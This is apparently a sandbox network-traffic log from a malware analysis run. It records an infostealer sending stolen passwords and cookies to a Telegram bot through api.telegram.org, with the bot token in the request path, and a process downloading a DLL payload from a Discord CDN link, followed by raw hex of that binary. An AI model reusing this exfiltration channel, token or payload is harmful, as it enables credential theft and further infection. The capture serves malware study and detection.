                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        {"ok":true,"result":{"message_id":1838,"from":{"id":5520247480,"is_bot":true,"first_name":"Gentlelogger","username":"gentlelogger_bot"},"chat":{"id":-624834641,"title":"Result Panel","type":"group","all_members_are_administrators":true},"date":1659971902,"document":{"file_name":"user-472847 2022-08-08 05-38-01.html","mime_type":"text/html","file_id":"BQACAgEAAxkDAAIHLmLxKT7h2SR9JzZb1ypbKqN9_gc6AAI7AwACOBiIR4whHSkIvQUEKQQ","file_unique_id":"AgADOwMAAjgYiEc","file_size":449},"caption":"New PW Recovered!\n\nUser Name: user/472847\nOSFullName: Microsoft Windows 7 Professional \nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        2192.168.2.2249176149.154.167.220443C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        2022-08-08 15:18:23 UTC62OUTPOST /bot5520247480:AAEoBq-eVV-KfON2FKSf_2riekCozVDdnus/sendDocument HTTP/1.1
                                                                                        Content-Type: multipart/form-data; boundary=---------------------------8da7966a100275c
                                                                                        Host: api.telegram.org
                                                                                        Content-Length: 5245
                                                                                        Expect: 100-continue
                                                                                        2022-08-08 15:18:23 UTC62INHTTP/1.1 100 Continue
                                                                                        2022-08-08 15:18:23 UTC62OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 37 39 36 36 61 31 30 30 32 37 35 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 2d 36 32 34 38 33 34 36 34 31 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 37 39 36 36 61 31 30 30 32 37 35 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 43 6f 6f 6b 69 65 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 41 6c 62 75 73 2f 34 37 32 38 34 37 0a 4f 53
                                                                                        Data Ascii: -----------------------------8da7966a100275cContent-Disposition: form-data; name="chat_id"-624834641-----------------------------8da7966a100275cContent-Disposition: form-data; name="caption"New Cookie Recovered!User Name: user/472847OS
                                                                                        2022-08-08 15:18:23 UTC63OUTData Raw: 4e 3c b6 2a 97 a2 6c 56 8b 79 d9 f8 4a 33 4e 8f 12 37 1a 09 f2 09 17 ce c5 49 83 b3 e7 71 95 58 8c 6a be 32 25 5e 8f 29 98 4e 6c 84 9d 34 91 14 61 a1 9e d6 d0 66 37 59 ed 26 6a fc 50 46 b5 21 2c 46 fb 32 1b 45 64 19 1e 84 26 2a 3e 21 ea 61 75 40 80 9c a4 63 48 32 6b df 27 5e 23 48 21 c7 48 ab c3 6e 24 0c a4 31 97 28 78 4a d3 50 79 8a 56 93 94 a2 c2 64 23 77 4c 8e 31 37 49 8e 31 f7 20 30 30 9b e5 e2 eb ed cd 5a 1d 32 9c 17 05 04 85 33 07 fb 91 8c 60 4a 64 cc bd 8e 4f d0 c6 a6 2a 75 d1 6a e5 a8 9e 9c d7 4f d4 69 16 28 75 69 d8 2b aa 34 39 f6 60 62 a3 9a 07 06 b0 f9 be 91 de 4f ca 67 a6 07 83 82 79 e5 d0 c9 2a 60 32 96 59 d4 73 d0 63 08 fa 1d 7a 0c 3d f3 0b 3c 71 00 00 00 00 00 00 00 00 00 78 76 93 47 4e dc 05 1c 89 78 29 b3 6d 62 b5 28 66 f8 0b 39 91 e2 e1
                                                                                        Data Ascii: N<*lVyJ3N7IqXj2%^)Nl4af7Y&jPF!,F2Ed&*>!au@cH2k'^#H!Hn$1(xJPyVd#wL17I1 00Z23`JdO*ujOi(ui+49`bOgy*`2Yscz=<qxvGNx)mb(f9
                                                                                        2022-08-08 15:18:23 UTC67OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 37 39 36 36 61 31 30 30 32 37 35 63 2d 2d 0d 0a
                                                                                        Data Ascii: -----------------------------8da7966a100275c--
                                                                                        2022-08-08 15:18:24 UTC67INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Mon, 08 Aug 2022 15:18:24 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 656
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        {"ok":true,"result":{"message_id":1839,"from":{"id":5520247480,"is_bot":true,"first_name":"Gentlelogger","username":"gentlelogger_bot"},"chat":{"id":-624834641,"title":"Result Panel","type":"group","all_members_are_administrators":true},"date":1659971904,"document":{"file_name":"user-472847 2022-08-08 05-51-02.zip","mime_type":"application/zip","file_id":"BQACAgEAAxkDAAIHL2LxKUDRDZJtO8q-U9Z2CDFgNEHIAAI8AwACOBiIR1lYYoNu0-ReKQQ","file_unique_id":"AgADPAMAAjgYiEc","file_size":4657},"caption":"New Cookie Recovered!\n\nUser Name: user/472847\nOSFullName: Microsoft Windows 7 Professional \nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        3192.168.2.2249177162.159.133.233443C:\Users\user\AppData\Local\Temp\Client.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        2022-08-08 15:18:38 UTC68OUTGET /attachments/1005703293437235255/1005705055426588785/RealProxyFlagsBadSignature.dll HTTP/1.1
                                                                                        Host: cdn.discordapp.com
                                                                                        Connection: Keep-Alive
                                                                                        2022-08-08 15:18:38 UTC68INHTTP/1.1 200 OK
                                                                                        Date: Mon, 08 Aug 2022 15:18:38 GMT
                                                                                        Content-Type: application/x-msdos-program
                                                                                        Content-Length: 59904
                                                                                        Connection: close
                                                                                        CF-Ray: 737939cbbd719b4f-FRA
                                                                                        Accept-Ranges: bytes
                                                                                        Age: 110661
                                                                                        Cache-Control: public, max-age=31536000
                                                                                        Content-Disposition: attachment;%20filename=RealProxyFlagsBadSignature.dll, attachment
                                                                                        ETag: "79242a4038e35f2234d3373fb9133c3b"
                                                                                        Expires: Tue, 08 Aug 2023 15:18:38 GMT
                                                                                        Last-Modified: Sun, 07 Aug 2022 05:12:50 GMT
                                                                                        Vary: Accept-Encoding
                                                                                        CF-Cache-Status: HIT
                                                                                        Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                        Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                        x-goog-generation: 1659849170365462
                                                                                        x-goog-hash: crc32c=NYw5/Q==
                                                                                        x-goog-hash: md5=eSQqQDjjXyI00zc/uRM8Ow==
                                                                                        x-goog-metageneration: 1
                                                                                        x-goog-storage-class: STANDARD
                                                                                        x-goog-stored-content-encoding: identity
                                                                                        x-goog-stored-content-length: 59904
                                                                                        X-GUploader-UploadID: ADPycdupy3j_iJTl9UiBtH5H_LUJWnS6fjM0m76xxXqjYgQUCBDR1OD6agA7taTw16tkQfa4JMZqj0cPImG4pQS7vaiveg
                                                                                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=oQYc9bk9okeXoUcUXjX6GX2mHdw78IyHqvDwbqUOrKiuvWbUAInr%2B7jCv5%2BkO8WFWEY5ugZyOMpanWBszSXDsuZDsD9LuewaL3%2BWh92NY5wdo2Siix%2FpBTSrsurJ1imCmNHd7g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        2022-08-08 15:18:38 UTC70INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                                                        Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                                                                        2022-08-08 15:18:38 UTC70INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 c2 48 ef 62 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 b8 00 00 00 30 00 00 00 00 00 00 8e d6 00 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 01 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELHb!0 @ @`
                                                                                        2022-08-08 15:18:38 UTC71INData Raw: 38 f8 01 00 00 38 f3 01 00 00 20 15 00 00 00 fe 0c 00 00 3f fc 00 00 00 20 15 00 00 00 fe 0c 00 00 3d 05 00 00 00 38 74 08 00 00 20 11 00 00 00 fe 0c 00 00 3f 64 00 00 00 20 11 00 00 00 fe 0c 00 00 3d 05 00 00 00 38 19 07 00 00 20 0f 00 00 00 fe 0c 00 00 3f 18 00 00 00 20 0f 00 00 00 fe 0c 00 00 3d 05 00 00 00 38 34 06 00 00 38 8b 01 00 00 20 10 00 00 00 fe 0c 00 00 3f 18 00 00 00 20 10 00 00 00 fe 0c 00 00 3d 05 00 00 00 38 93 06 00 00 38 65 01 00 00 38 60 01 00 00 20 13 00 00 00 fe 0c 00 00 3f 3e 00 00 00 20 13 00 00 00 fe 0c 00 00 3d 05 00 00 00 38 35 07 00 00 20 12 00 00 00 fe 0c 00 00 3f 18 00 00 00 20 12 00 00 00 fe 0c 00 00 3d 05 00 00 00 38 cd 06 00 00 38 19 01 00 00 38 14 01 00 00 20 14 00 00 00 fe 0c 00 00 3f 18 00 00 00 20 14 00 00 00 fe 0c 00
                                                                                        Data Ascii: 88 ? =8t ?d =8 ? =848 ? =88e8` ?> =85 ? =888 ?
                                                                                        2022-08-08 15:18:38 UTC72INData Raw: 04 00 fe 0c 03 00 20 01 00 00 00 59 20 01 00 00 00 9c fe 0c 08 00 fe 0c 03 00 20 01 00 00 00 59 8f 05 00 00 01 e0 fe 0c 06 00 fe 0c 03 00 20 01 00 00 00 59 9a fe 0c 08 00 fe 0c 03 00 20 01 00 00 00 59 8f 05 00 00 01 e0 4a fe 0c 01 00 7e 03 00 00 04 fe 0c 0b 00 fe 0c 03 00 20 01 00 00 00 59 94 97 29 05 00 00 11 7e 03 00 00 04 fe 0c 0c 00 fe 0c 02 00 58 4a 97 29 06 00 00 11 55 fe 0c 0c 00 20 08 00 00 00 58 fe 0e 0c 00 38 c3 f7 ff ff fe 0c 08 00 fe 0c 03 00 20 02 00 00 00 59 8f 05 00 00 01 e0 4c fe 0c 08 00 fe 0c 03 00 20 01 00 00 00 59 8f 05 00 00 01 e0 4c fe 02 fe 0c 0c 00 fe 0c 02 00 58 4a fe 0c 0c 00 20 08 00 00 00 58 fe 0c 02 00 58 4a 59 5a fe 0c 0c 00 20 08 00 00 00 58 fe 0c 02 00 58 4a 58 fe 0c 0f 00 58 fe 0e 0c 00 fe 0c 03 00 20 02 00 00 00 59 fe 0e
                                                                                        Data Ascii: Y Y Y YJ~ Y)~XJ)U X8 YL YLXJ XXJYZ XXJXX Y
                                                                                        2022-08-08 15:18:38 UTC74INData Raw: 06 03 00 00 06 9b 7e 03 00 00 04 20 02 00 00 00 fe 06 04 00 00 06 9b 7e 03 00 00 04 20 03 00 00 00 fe 06 05 00 00 06 9b 7e 03 00 00 04 20 04 00 00 00 fe 06 06 00 00 06 9b 7e 03 00 00 04 20 05 00 00 00 fe 06 07 00 00 06 9b 7e 03 00 00 04 20 06 00 00 00 fe 06 08 00 00 06 9b 7e 03 00 00 04 20 07 00 00 00 fe 06 09 00 00 06 9b 2a 26 02 28 08 00 00 0a 00 00 2a 2a 00 02 28 0c 00 00 0a 00 00 2a aa 73 0e 00 00 0a 80 04 00 00 04 73 0f 00 00 0a 80 05 00 00 04 73 10 00 00 0a 80 06 00 00 04 73 11 00 00 0a 80 07 00 00 04 00 2a 13 30 01 00 10 00 00 00 0a 00 00 11 00 7e 04 00 00 04 6f 12 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 0b 00 00 11 00 7e 05 00 00 04 6f 13 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 0c 00 00 11 00 7e 06 00 00 04 6f 14 00 00 0a 0a 2b 00
                                                                                        Data Ascii: ~ ~ ~ ~ ~ ~ *&(**(*ssss*0~o+*0~o+*0~o+
                                                                                        2022-08-08 15:18:38 UTC75INData Raw: 2b 0d 07 6f 3a 00 00 0a 6f 3b 00 00 0a 13 04 09 14 fe 01 16 fe 01 13 10 11 10 39 25 01 00 00 02 2c 03 03 2d 03 16 2b 01 17 00 13 11 11 11 2c 58 02 8e b7 17 da 13 05 16 11 05 13 0e 13 08 2b 3e 02 11 08 9a 13 07 03 11 08 9a 13 06 11 04 11 07 6f 3c 00 00 0a 13 11 11 11 2c 1b 09 11 06 28 3d 00 00 0a 13 10 11 10 2c 07 07 6f 3e 00 00 0a 00 00 14 0b 00 2b 12 00 00 11 08 17 d6 13 08 11 08 11 0e 13 12 11 12 31 b8 00 07 14 fe 01 16 fe 01 13 11 11 11 39 aa 00 00 00 04 14 fe 01 16 fe 01 13 10 11 10 2c 7f 04 6f 3f 00 00 0a 17 da 13 09 16 11 09 13 0f 13 0d 2b 62 04 11 0d 6f 40 00 00 0a 13 0a 11 0a 6f 3a 00 00 0a 6f 3b 00 00 0a 13 0c 11 0a 6f 06 00 00 2b 13 0b 11 0b 14 fe 01 16 fe 01 13 11 11 11 2c 2b 11 04 11 0c 6f 3c 00 00 0a 13 10 11 10 2c 1b 09 11 0b 28 3d 00 00 0a
                                                                                        Data Ascii: +o:o;9%,-+,X+>o<,(=,o>+19,o?+bo@o:o;o+,+o<,(=
                                                                                        2022-08-08 15:18:38 UTC77INData Raw: 11 2f 28 31 00 00 06 13 04 18 8d 08 00 00 01 13 2f 11 2f 16 72 1a 08 00 70 a2 00 11 2f 17 72 15 0a 00 70 a2 00 11 2f 28 31 00 00 06 13 14 18 8d 08 00 00 01 13 2f 11 2f 16 72 ba 0a 00 70 a2 00 11 2f 17 72 61 0d 00 70 a2 00 11 2f 28 31 00 00 06 13 08 18 8d 08 00 00 01 13 2f 11 2f 16 72 06 0e 00 70 a2 00 11 2f 17 72 53 11 00 70 a2 00 11 2f 28 31 00 00 06 13 0a 18 8d 08 00 00 01 13 2f 11 2f 16 72 f8 11 00 70 a2 00 11 2f 17 72 a3 14 00 70 a2 00 11 2f 28 31 00 00 06 13 0b 18 8d 08 00 00 01 13 2f 11 2f 16 72 48 15 00 70 a2 00 11 2f 17 72 9f 18 00 70 a2 00 11 2f 28 31 00 00 06 13 0c 18 8d 08 00 00 01 13 2f 11 2f 16 72 44 19 00 70 a2 00 11 2f 17 72 9b 1c 00 70 a2 00 11 2f 28 31 00 00 06 13 0d 18 8d 08 00 00 01 13 2f 11 2f 16 72 40 1d 00 70 a2 00 11 2f 17 72 ed 1f
                                                                                        Data Ascii: /(1//rp/rp/(1//rp/rap/(1//rp/rSp/(1//rp/rp/(1//rHp/rp/(1//rDp/rp/(1//r@p/r
                                                                                        2022-08-08 15:18:38 UTC78INData Raw: 13 32 11 32 2c 06 73 5e 00 00 0a 7a 00 11 06 12 01 7b 10 00 00 04 6f 5e 00 00 06 15 fe 01 13 32 11 32 2c 06 73 5e 00 00 0a 7a 00 de 40 25 28 61 00 00 0a 13 2d 00 12 01 7b 11 00 00 04 84 28 62 00 00 0a 13 2e 11 2e 14 fe 01 16 fe 01 13 32 11 32 2c 08 11 2e 6f 63 00 00 0a 00 00 16 13 07 28 64 00 00 0a de 0d 28 64 00 00 0a de 00 00 17 13 07 2b 00 11 07 2a 41 1c 00 00 00 00 00 00 5e 02 00 00 45 03 00 00 a3 05 00 00 40 00 00 00 09 00 00 01 13 30 03 00 25 00 00 00 23 00 00 11 00 02 28 13 00 00 2b 0c 02 28 14 00 00 2b 0a 08 06 7e 67 00 00 0a 6f 68 00 00 0a 28 69 00 00 0a 0b 2b 00 07 2a 00 00 00 13 30 04 00 11 00 00 00 0e 00 00 11 00 02 03 04 17 28 30 00 00 06 26 17 0a 2b 00 06 2a 00 00 00 13 30 02 00 3b 00 00 00 24 00 00 11 00 7e 1c 00 00 04 14 28 6a 00 00 0a 0c
                                                                                        Data Ascii: 22,s^z{o^22,s^z@%(a-{(b..22,.oc(d(d+*A^E@0%#(+(+~goh(i+*0(0&+*0;$~(j
                                                                                        2022-08-08 15:18:38 UTC79INData Raw: 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 0a 0a 00 00 00 01 23 e0 a6 83 83 a6 e0 23 01 23 e0 a6 e1 e1 a6 e0 23 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 0b 0b 00 00 00 01 44 f4 63 61 61 63 f4 44 01 44 f4 63 0d 0d 63 f4 44 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 0c 0c 00 00 00 01 3b 76 fc f1 f1 fc 76 3b 01 3b 76 fc 88 88 fc 76 3b 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 0d 0d 00 00 00 01 7e 32 10 97 97 10 32 7e 01 7e 32 10 b7 b7 10 32 7e 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 0e 0e 00 00 00 01 62 ab d2 14 14 d2 ab 62 01 62 ab d2 63 63 d2 ab 62 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00
                                                                                        Data Ascii: ####DcaacDDccD;vv;;vv;~22~~22~bbbccb
                                                                                        2022-08-08 15:18:38 UTC81INData Raw: 26 00 00 00 01 72 76 bb 70 70 bb 76 72 01 72 76 bb 02 02 bb 76 72 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 27 27 00 00 00 01 55 ac 1d 45 45 1d ac 55 01 55 ac 1d 36 36 1d ac 55 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 28 28 00 00 00 01 71 fa 59 45 45 59 fa 71 01 71 fa 59 2c 2c 59 fa 71 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 29 29 00 00 00 01 08 5f 25 11 11 25 5f 08 01 08 5f 25 7e 7e 25 5f 08 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 2a 2a 00 00 00 01 03 c6 8f d4 d4 8f c6 03 01 03 c6 8f ba ba 8f c6 03 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 2b 2b 00 00 00 01 38 ca 33 09 09 33 ca 38 01 38
                                                                                        Data Ascii: &rvppvrrvvr''UEEUU66U((qYEEYqqY,,Yq))_%%__%~~%_**++83388
                                                                                        2022-08-08 15:18:38 UTC82INData Raw: 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 43 43 00 00 00 01 53 1f 2d f2 f2 2d 1f 53 01 53 1f 2d 93 93 2d 1f 53 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 44 44 00 00 00 01 20 bf 80 05 05 80 bf 20 01 20 bf 80 7c 7c 80 bf 20 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 45 45 00 00 00 01 02 83 a0 91 91 a0 83 02 01 02 83 a0 e2 e2 a0 83 02 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 46 46 00 00 00 01 00 23 d5 db db d5 23 00 01 00 23 d5 fb fb d5 23 00 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 47 47 00 00 00 01 32 6e 0d 17 17 0d 6e 32 01 32 6e 0d 76 76 0d 6e 32 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00
                                                                                        Data Ascii: CCS--SS--SDD || EEFF####GG2nn22nvvn2
                                                                                        2022-08-08 15:18:38 UTC83INData Raw: 00 00 01 5b a6 9c 50 50 9c a6 5b 01 5b a6 9c 70 70 9c a6 5b 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 60 60 00 00 00 01 05 6b 97 c3 c3 97 6b 05 01 05 6b 97 ab ab 97 6b 05 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 61 61 00 00 00 01 1f 01 62 87 87 62 01 1f 01 1f 01 62 f3 f3 62 01 1f 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 62 62 00 00 00 01 1b d6 66 06 06 66 d6 1b 01 1b d6 66 72 72 66 d6 1b 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 63 63 00 00 00 01 22 2a 7a 8a 8a 7a 2a 22 01 22 2a 7a fa fa 7a 2a 22 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 64 64 00 00 00 01 3f 18 b1 96 96 b1 18 3f 01 3f 18 b1
                                                                                        Data Ascii: [PP[[pp[``kkkkaabbbbbbfffrrfcc"*zz*""*zz*"dd???
                                                                                        2022-08-08 15:18:38 UTC85INData Raw: 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 7c 7c 00 00 00 01 46 24 a0 0d 0d a0 24 46 01 46 24 a0 23 23 a0 24 46 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 7d 7d 00 00 00 01 14 42 91 60 60 91 42 14 01 14 42 91 08 08 91 42 14 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 7e 7e 00 00 00 01 0f 29 86 71 71 86 29 0f 01 0f 29 86 05 05 86 29 0f 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 7f 7f 00 00 00 01 36 ce c7 32 32 c7 ce 36 01 36 ce c7 5f 5f c7 ce 36 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 80 80 00 00 00 01 27 33 bb 08 08 bb 33 27 01 27 33 bb 64 64 bb 33 27 06 15 16 00 00 00 05 05 00 00 00 17 00 00 00 06 06 00 00 00
                                                                                        Data Ascii: ||F$$FF$##$F}}B``BBB~~)qq)))62266__6'33''3dd3'
                                                                                        2022-08-08 15:18:38 UTC86INData Raw: 01 77 3a 83 96 96 83 3a 77 01 77 3a 83 f9 f9 83 3a 77 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 15 15 00 00 00 01 07 0d b1 74 74 b1 0d 07 01 07 0d b1 00 00 b1 0d 07 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 16 16 00 00 00 01 7b 43 ce 6d 6d ce 43 7b 01 7b 43 ce 08 08 ce 43 7b 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 17 17 00 00 00 01 1d aa 8e cc cc 8e aa 1d 01 1d aa 8e af af 8e aa 1d 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 18 18 00 00 00 01 18 ac 10 61 61 10 ac 18 01 18 ac 10 15 15 10 ac 18 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 19 19 00 00 00 01 4a 2f 0a 96 96 0a 2f 4a 01 4a 2f 0a f3 f3
                                                                                        Data Ascii: w::ww::wtt{CmmC{{CC{aaJ//JJ/
                                                                                        2022-08-08 15:18:38 UTC87INData Raw: 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 31 31 00 00 00 01 32 4f 28 aa aa 28 4f 32 01 32 4f 28 c7 c7 28 4f 32 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 32 32 00 00 00 01 13 6d 96 e4 e4 96 6d 13 01 13 6d 96 a0 a0 96 6d 13 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 33 33 00 00 00 01 3c ab de ba ba de ab 3c 01 3c ab de d5 d5 de ab 3c 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 34 34 00 00 00 01 45 4d 54 d6 d6 54 4d 45 01 45 4d 54 a2 a2 54 4d 45 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 35 35 00 00 00 01 25 16 9c a5 a5 9c 16 25 01 25 16 9c 85 85 9c 16 25 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01
                                                                                        Data Ascii: 112O((O22O((O222mmmm33<<<<44EMTTMEEMTTME55%%%%
                                                                                        2022-08-08 15:18:38 UTC89INData Raw: b2 63 8a 8a 63 b2 65 01 65 b2 63 ff ff 63 b2 65 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 4e 4e 00 00 00 01 4b 2b cb ea ea cb 2b 4b 01 4b 2b cb 93 93 cb 2b 4b 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 4f 4f 00 00 00 01 16 9d 9a 2e 2e 9a 9d 16 01 16 9d 9a 0e 0e 9a 9d 16 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 50 50 00 00 00 01 09 a8 9b 11 11 9b a8 09 01 09 a8 9b 77 77 9b a8 09 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 51 51 00 00 00 01 26 25 c2 42 42 c2 25 26 01 26 25 c2 37 37 c2 25 26 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 52 52 00 00 00 01 63 12 23 67 67 23 12 63 01 63 12 23 0b 0b 23 12
                                                                                        Data Ascii: cceecceNNK++KK++KOO..PPwwQQ&%BB%&&%77%&RRc#gg#cc##
                                                                                        2022-08-08 15:18:38 UTC90INData Raw: 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 6a 6a 00 00 00 01 09 a8 84 c6 c6 84 a8 09 01 09 a8 84 b1 b1 84 a8 09 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 6b 6b 00 00 00 01 50 9e 93 66 66 93 9e 50 01 50 9e 93 48 48 93 9e 50 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 6c 6c 00 00 00 01 66 0c e7 09 09 e7 0c 66 01 66 0c e7 68 68 e7 0c 66 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 6d 6d 00 00 00 01 62 b3 c7 2b 2b c7 b3 62 01 62 b3 c7 59 59 c7 b3 62 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 6e 6e 00 00 00 01 4c 57 57 48 48 57 57 4c 01 4c 57 57 25 25 57 57 4c 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00
